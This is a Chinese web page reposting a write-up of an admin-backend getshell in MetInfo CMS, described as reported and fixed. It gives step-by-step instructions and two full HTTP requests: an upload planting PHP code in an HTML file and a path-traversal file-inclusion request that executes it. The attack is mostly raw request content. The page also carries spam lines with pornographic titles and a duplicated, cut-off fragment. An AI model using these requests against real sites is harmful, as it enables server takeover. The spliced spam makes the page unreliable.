1. 先登陸后臺

2. 在安全與效率設置可上傳 Html

3. 上傳 html 要記得路徑

POST /admin123/?c=editor&m=include&a=doeditor&lang=cn&action=uploadim" />

国产成人精品无码青草_亚洲国产美女精品久久久久∴_欧美人与鲁交大毛片免费_国产果冻豆传媒麻婆精东

18143453325 在線咨詢 在線咨詢
18143453325 在線咨詢
所在位置: 首頁 > 營銷資訊 > 網站運營 > 關于米拓建站 CMS 的后臺 getshell (已提交并且修復)

關于米拓建站 CMS 的后臺 getshell (已提交并且修復)

時間:2023-04-21 11:15:01 | 來源:網站運營

時間:2023-04-21 11:15:01 來源:網站運營

關于米拓建站 CMS 的后臺 getshell (已提交并且修復):原文鏈接

1. 先登陸后臺

2. 在安全與效率設置可上傳 Html

3. 上傳 html 要記得路徑

POST /admin123/?c=editor&m=include&a=doeditor&lang=cn&action=uploadimage&skin_name=cn&encode=utf-8 HTTP/1.1
Host: 192.168.56.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X_Requested_With: XMLHttpRequest
Referer: http://192.168.56.1/public/plugins/ueditor/dialogs/image/image.html
Content-Length: 758
Content-Type: multipart/form-data; boundary=---------------------------264601028229646
Cookie: Hm_lvt_520556228c0113270c0c772027905838=1611498833,1612401073,1612419272; PHPSESSID=od5us1ni189fod8joutpibg112; Hm_lpvt_520556228c0113270c0c772027905838=1612423710; acc_auth=e5184s6tTE2%2BK86Eca7crrRAzpbsb0a5RsH0wGJ8jEXkwWXMmrQGk3tQc7nBEMkrAAjA19l0D95ZCCVmwPa31%2FWt%2BW1hxPSbuw; acc_key=nRAVdTM; re_url=http%3A%2F%2Flocalhost%2Fadmin123%2F; met_auth=ac8bMmk5PegkX%2BRqq6yIYb%2FssgjIfjX%2FoGjz7Hc%2BK3yKbyKxpoNMHxJH%2Fc3DGnq9Tcp2E%2FzTqQTmO3ZGtpmn6MLC; met_key=bP3ugcP; admin_lang=cn; page_iframe_url=http%3A%2F%2F192.168.56.1%2Findex.php%3Flang%3Dcn%26pageset%3D1; arrlanguage=metinfo
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
-----------------------------264601028229646
Content-Disposition: form-data; name="id"
WU_FILE_0
-----------------------------264601028229646
Content-Disposition: form-data; name="name"
best.html
-----------------------------264601028229646
Content-Disposition: form-data; name="type"
text/html
-----------------------------264601028229646
Content-Disposition: form-data; name="lastModifiedDate"
Thu Feb 04 2021 15:27:22 GMT+0800
-----------------------------264601028229646
Content-Disposition: form-data; name="size"
19
-----------------------------264601028229646
Content-Disposition: form-data; name="upfile"; filename="best.html"
Content-Type: text/html
<?php phpinfo(); ?>
-----------------------------264601028229646--



4. 刷新主頁,進行文件包含利用

POST /admin123/?m=include&c=loadtemp&a=doviewhtml HTTP/1.1
Host: 192.168.56.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.56.1/admin123/
Content-Length: 34
Cookie: Hm_lvt_520556228c0113270c0c772027905838=1611498833,1612401073,1612419272; PHPSESSID=od5us1ni189fod8joutpibg112; Hm_lpvt_520556228c0113270c0c772027905838=1612423710; acc_auth=e5184s6tTE2%2BK86Eca7crrRAzpbsb0a5RsH0wGJ8jEXkwWXMmrQGk3tQc7nBEMkrAAjA19l0D95ZCCVmwPa31%2FWt%2BW1hxPSbuw; acc_key=nRAVdTM; re_url=http%3A%2F%2Flocalhost%2Fadmin123%2F; met_auth=ac8bMmk5PegkX%2BRqq6yIYb%2FssgjIfjX%2FoGjz7Hc%2BK3yKbyKxpoNMHxJH%2Fc3DGnq9Tcp2E%2FzTqQTmO3ZGtpmn6MLC; met_key=bP3ugcP; admin_lang=cn; page_iframe_url=http%3A%2F%2F192.168.56.1%2Findex.php%3Flang%3Dcn%26pageset%3D1; arrlanguage=metinfo
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Cache-Control: max-age=0
path=..//upload//202102//best.html



圖示:























提交漏洞有效證明:


關鍵詞:后臺,提交,修復,并且

74
73
25
news

版權所有? 億企邦 1997-2025 保留一切法律許可權利。

為了最佳展示效果,本站不支持IE9及以下版本的瀏覽器,建議您使用谷歌Chrome瀏覽器。 點擊下載Chrome瀏覽器
關閉